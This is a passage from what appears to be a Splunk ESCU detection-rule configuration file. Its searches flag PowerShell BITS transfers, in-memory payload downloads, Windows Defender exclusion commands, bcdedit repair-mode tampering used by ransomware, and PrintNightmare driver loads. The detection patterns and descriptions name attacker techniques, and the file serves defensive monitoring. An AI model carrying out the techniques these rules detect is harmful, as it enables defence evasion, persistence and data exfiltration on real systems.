"CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BITS Jobs"] action.risk = 1 action.risk.param._risk_message = A suspicious process $process_name$ with commandline $process$ that are related to bittransfer functionality in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell Start-BitsTransfer - Rule action.correlationsearch.annotations = {"analytic_story": ["BITS Jobs"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1197"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Start-BitsTransfer is the PowerShell "version" of BitsAdmin.exe. Similar functionality is present. This technique variation is not as commonly used by adversaries, but has been abused in the past. Lesser known uses include the ability to set the `-TransferType` to `Upload` for exfiltration of files. In an instance where `Upload` is used, it is highly possible files will be archived. During triage, review parallel processes and process lineage. Capture any files on disk and review. For the remote domain or IP, what is the reputation? action.notable.param.rule_title = PowerShell Start-BitsTransfer action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*start-bitstransfer* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.original_file_name Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_start_bitstransfer_filter` [ESCU - PowerShell Start or Stop Service - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies the use of PowerShell's Start-Service or Stop-Service cmdlets on an endpoint. These cmdlets allow users to start or stop a specified Windows service. The ability to manipulate services can be leveraged by attackers to disable or stop critical services, which can cause system instability or disrupt business operations. By detecting the use of Start-Service or Stop-Service cmdlets via PowerShell, this analytic can help organizations identify potential malicious activity related to attackers attempting to manipulate services on compromised systems. However, note that this behavior may be noisy, as these cmdlets are commonly used by system administrators or other legitimate users to manage services. Therefore, it is recommended not to enable this analytic as a direct notable or TTP. Instead, it should be used as part of a broader set of security controls to detect and investigate potential threats. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies the use of PowerShell's Start-Service or Stop-Service cmdlets on an endpoint. These cmdlets allow users to start or stop a specified Windows service. The ability to manipulate services can be leveraged by attackers to disable or stop critical services, which can cause system instability or disrupt business operations. By detecting the use of Start-Service or Stop-Service cmdlets via PowerShell, this analytic can help organizations identify potential malicious activity related to attackers attempting to manipulate services on compromised systems. However, note that this behavior may be noisy, as these cmdlets are commonly used by system administrators or other legitimate users to manage services. Therefore, it is recommended not to enable this analytic as a direct notable or TTP. Instead, it should be used as part of a broader set of security controls to detect and investigate potential threats. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = This behavior may be noisy, as these cmdlets are commonly used by system administrators or other legitimate users to manage services. Therefore, it is recommended not to enable this analytic as a direct notable or TTP. Instead, it should be used as part of a broader set of security controls to detect and investigate potential threats. action.escu.creation_date = 2023-03-24 action.escu.modification_date = 2023-03-24 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell Start or Stop Service - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = PowerShell was identified attempting to start or stop a service on $Computer$. action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell Start or Stop Service - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 20, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN ("*start-service*", "*stop-service*") | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_start_or_stop_service_filter` [ESCU - Powershell Using memory As Backing Store - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is using memory stream as new object backstore. The malicious PowerShell script will contain stream flate data and will be decompressed in memory to run or drop the actual payload. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is using memory stream as new object backstore. The malicious PowerShell script will contain stream flate data and will be decompressed in memory to run or drop the actual payload. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = powershell may used this function to store out object into memory. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Using memory As Backing Store - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction", "IcedID"] action.risk = 1 action.risk.param._risk_message = A PowerShell script contains memorystream command in $ScriptBlockText$ as new object backstore with EventCode $EventCode$ on host $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Using memory As Backing Store - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction", "IcedID"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is using memory stream as new object backstore. The malicious PowerShell script will contain stream flate data and will be decompressed in memory to run or drop the actual payload. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.notable.param.rule_title = Powershell Using memory As Backing Store action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = *New-Object* ScriptBlockText = *IO.MemoryStream* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_using_memory_as_backing_store_filter` [ESCU - PowerShell WebRequest Using Memory Stream - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a common fileless malware staging technique of using .NET classes to directly download a URL payload into memory. The analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Command and Control", "Exploitation"], "mitre_attack": ["T1059.001", "T1105", "T1027.011"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies a common fileless malware staging technique of using .NET classes to directly download a URL payload into memory. The analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. action.escu.how_to_implement = The following analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = Unknown, possible custom scripting. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell WebRequest Using Memory Stream - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell"] action.risk = 1 action.risk.param._risk_message = Powershell webrequest to memory stream behavior. Possible fileless malware staging on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell WebRequest Using Memory Stream - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Installation", "Command and Control", "Exploitation"], "mitre_attack": ["T1059.001", "T1105", "T1027.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a common fileless malware staging technique of using .NET classes to directly download a URL payload into memory. The analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. action.notable.param.rule_title = PowerShell WebRequest Using Memory Stream action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN ("*system.net.webclient*","*system.net.webrequest*") AND ScriptBlockText="*IO.MemoryStream*" | eval Path = case(isnotnull(Path),Path,true(),"unknown") | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command values(Path) as file_name values(UserID) as user by ActivityID, Computer, EventCode | rename Computer as dest, EventCode as signature_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_webrequest_using_memory_stream_filter` [ESCU - Powershell Windows Defender Exclusion Commands - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will detect a suspicious process commandline related to windows defender exclusion feature. This command is abused by adversaries, malware author and red teams to bypassed Windows Defender Anti-Virus product by excluding folder path, file path, process, extensions and etc. from its real time or schedule scan to execute their malicious code. This is a good indicator for defense evasion and to look further for events after this behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic will detect a suspicious process commandline related to windows defender exclusion feature. This command is abused by adversaries, malware author and red teams to bypassed Windows Defender Anti-Virus product by excluding folder path, file path, process, extensions and etc. from its real time or schedule scan to execute their malicious code. This is a good indicator for defense evasion and to look further for events after this behavior. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Registry` node. Also make sure that this registry was included in your config files ex. sysmon config to be monitored. action.escu.known_false_positives = admin or user may choose to use this windows features. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Windows Defender Exclusion Commands - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["CISA AA22-320A", "AgentTesla", "Remcos", "Windows Defense Evasion Tactics", "Data Destruction", "WhisperGate", "Warzone RAT"] action.risk = 1 action.risk.param._risk_message = exclusion command $Message$ executed on $ComputerName$ action.risk.param._risk = [{"risk_object_field": "User", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "ComputerName", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Windows Defender Exclusion Commands - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA22-320A", "AgentTesla", "Remcos", "Windows Defense Evasion Tactics", "Data Destruction", "WhisperGate", "Warzone RAT"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic will detect a suspicious process commandline related to windows defender exclusion feature. This command is abused by adversaries, malware author and red teams to bypassed Windows Defender Anti-Virus product by excluding folder path, file path, process, extensions and etc. from its real time or schedule scan to execute their malicious code. This is a good indicator for defense evasion and to look further for events after this behavior. action.notable.param.rule_title = Powershell Windows Defender Exclusion Commands action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (Message = "*Add-MpPreference *" OR Message = "*Set-MpPreference *") AND Message = "*-exclusion*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message ComputerName User | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_windows_defender_exclusion_commands_filter` [ESCU - Prevent Automatic Repair Mode using Bcdedit - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious bcdedit.exe execution to ignore all failures. This technique was used by ransomware to prevent the compromise machine automatically boot in repair mode. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious bcdedit.exe execution to ignore all failures. This technique was used by ransomware to prevent the compromise machine automatically boot in repair mode. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may modify the boot configuration ignore failure during testing and debugging. action.escu.creation_date = 2021-06-10 action.escu.modification_date = 2021-06-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Prevent Automatic Repair Mode using Bcdedit - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Chaos Ransomware"] action.risk = 1 action.risk.param._risk_message = A suspicious process $process_name$ with process id $process_id$ contains commandline $process$ to ignore all bcdedit execution failure in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Prevent Automatic Repair Mode using Bcdedit - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Chaos Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious bcdedit.exe execution to ignore all failures. This technique was used by ransomware to prevent the compromise machine automatically boot in repair mode. action.notable.param.rule_title = Prevent Automatic Repair Mode using Bcdedit action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "bcdedit.exe" Processes.process = "*bootstatuspolicy*" Processes.process = "*ignoreallfailures*" by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `prevent_automatic_repair_mode_using_bcdedit_filter` [ESCU - Print Processor Registry Autostart - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic is to detect a suspicious modification or new registry entry regarding print processor. This registry is known to be abuse by turla or other APT to gain persistence and privilege escalation to the compromised machine. This is done by adding the malicious dll payload on the new created key in this registry that will be executed as it restarted the spoolsv.exe process and services. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious modification or new registry entry regarding print processor. This registry is known to be abuse by turla or other APT to gain persistence and privilege escalation to the compromised machine. This is done by adding the malicious dll payload on the new created key in this registry that will be executed as it restarted the spoolsv.exe process and services. action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via endpoint detection-and-response product, such as Carbon Black or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry. action.escu.known_false_positives = possible new printer installation may add driver component on this registry. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Print Processor Registry Autostart - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Windows Privilege Escalation", "Hermetic Wiper", "Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = modified/added/deleted registry entry $Registry.registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Print Processor Registry Autostart - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Windows Privilege Escalation", "Hermetic Wiper", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious modification or new registry entry regarding print processor. This registry is known to be abuse by turla or other APT to gain persistence and privilege escalation to the compromised machine. This is done by adding the malicious dll payload on the new created key in this registry that will be executed as it restarted the spoolsv.exe process and services. action.notable.param.rule_title = Print Processor Registry Autostart action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path ="*\\Control\\Print\\Environments\\Windows x64\\Print Processors*" by Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `print_processor_registry_autostart_filter` [ESCU - Print Spooler Adding A Printer Driver - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies new printer drivers being load by utilizing the Windows PrintService operational logs, EventCode 316. This was identified during our testing of CVE-2021-34527 previously (CVE-2021-1675) or PrintNightmare. \ Within the proof of concept code, the following event will occur - "Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, kernelbase.dll, evil.dll. No user action is required." \ During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events and review the source of where the exploitation began. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies new printer drivers being load by utilizing the Windows PrintService operational logs, EventCode 316. This was identified during our testing of CVE-2021-34527 previously (CVE-2021-1675) or PrintNightmare. \ Within the proof of concept code, the following event will occur - "Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, kernelbase.dll, evil.dll. No user action is required." \ During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events and review the source of where the exploitation began. action.escu.how_to_implement = You will need to ensure PrintService Admin and Operational logs are being logged to Splunk from critical or all systems. action.escu.known_false_positives = Unknown. This may require filtering. action.escu.creation_date = 2021-07-01 action.escu.modification_date = 2021-07-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Print Spooler Adding A Printer Driver - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"] action.risk = 1 action.risk.param._risk_message = Suspicious print driver was loaded on endpoint $ComputerName$. action.risk.param._risk = [{"risk_object_field": "ComputerName", "risk_object_type": "system", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Print Spooler Adding A Printer Driver - Rule action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527", "CVE-2021-1675"], "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies new printer drivers being load by utilizing the Windows PrintService operational logs, EventCode 316. This was identified during our testing of CVE-2021-34527 previously (CVE-2021-1675) or PrintNightmare. \ Within the proof of concept code, the following event will occur - "Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, kernelbase.dll, evil.dll. No user action is required." \ During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events and review the source of where the exploitation began. action.notable.param.rule_title = Print Spooler Adding A Printer Driver action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `printservice` EventCode=316 category = "Adding a printer driver" Message = "*kernelbase.dll,*" Message = "*UNIDRV.DLL,*" Message = "*.DLL.*" | stats count min(_time) as firstTime max(_time) as lastTime by OpCode EventCode ComputerName Message | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `print_spooler_adding_a_printer_driver_filter` [ESCU - Print Spooler Failed to Load a Plug-in - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies driver load errors utilizing the Windows PrintService Admin logs. This was identified during our testing of CVE-2021-34527 previously (CVE-2021-1675) or PrintNightmare. \ Within the proof of concept code, the following error will occur - "The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\meterpreter.dll, error code 0x45A. See the event user data for context information." \ The analytic is based on file path and failure to load the plug-in. \ During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies driver load errors utilizing the Windows PrintService Admin logs. This was identified during our testing of CVE-2021-34527 previously (CVE-2021-1675) or PrintNightmare. \ Within the proof of concept code, the following error will occur - "The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\meterpreter.dll, error code 0x45A. See the event user data for context information." \ The analytic is based on file path and failure to load the plug-in. \ During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events. action.escu.how_to_implement = You will need to ensure PrintService Admin and Operational logs are being logged to Splunk from critical or all systems. action.escu.known_false_positives = False positives are unknown and filtering may be required. action.escu.creation_date = 2021-07-01 action.escu.modification_date = 2021-07-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Print Spooler Failed to Load a Plug-in - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"] action.risk = 1 action.risk.param._risk_message = Suspicious printer spooler errors have occured on endpoint $ComputerName$ with EventCode $EventCode$. action.risk.param._risk = [{"risk_object_field": "ComputerName", "risk_object_type": "system", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Print Spooler Failed to Load a Plug-in - Rule action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527", "CVE-2021-1675"], "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies driver load errors utilizing the Windows PrintService Admin logs. This was identified during our testing of CVE-2021-34527 previously (CVE-2021-1675) or PrintNightmare. \ Within the proof of concept code, the following error will occur - "The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\meterpreter.dll, error code 0x45A. See the event user data for context information." \ The analytic is based on file path and failure to load the plug-in. \ During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events. action.notable.param.rule_title = Print Spooler Failed to Load a Plug-in action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `printservice` ((ErrorCode="0x45A" (EventCode="808" OR EventCode="4909")) OR ("The print spooler failed to load a plug-in module" OR "\\drivers\\x64\\")) | stats count min(_time) as firstTime max(_time) as lastTime by OpCode EventCode ComputerName Message | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `print_spooler_failed_to_load_a_plug_in_filter` [ESCU - Process Creating LNK file in Suspicious Location - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for a process launching an `*.lnk` file under `C:\User*` or `*\Local\Temp\*`. This is common behavior used by various spear phishing tools. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for a process launching an `*.lnk` file under `C:\User*` or `*\Local\Temp\*`. This is common behavior used by various spear phishing tools. action.escu.how_to_implement = You must be ingesting data that records filesystem and process activity from your hosts to populate the Endpoint data model. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. action.escu.known_false_positives = This detection should yield little or no false positive results. It is uncommon for LNK files to be executed from temporary or user directories. action.escu.creation_date = 2021-08-26 action.escu.modification_date = 2021-08-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Process Creating LNK file in Suspicious Location - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = 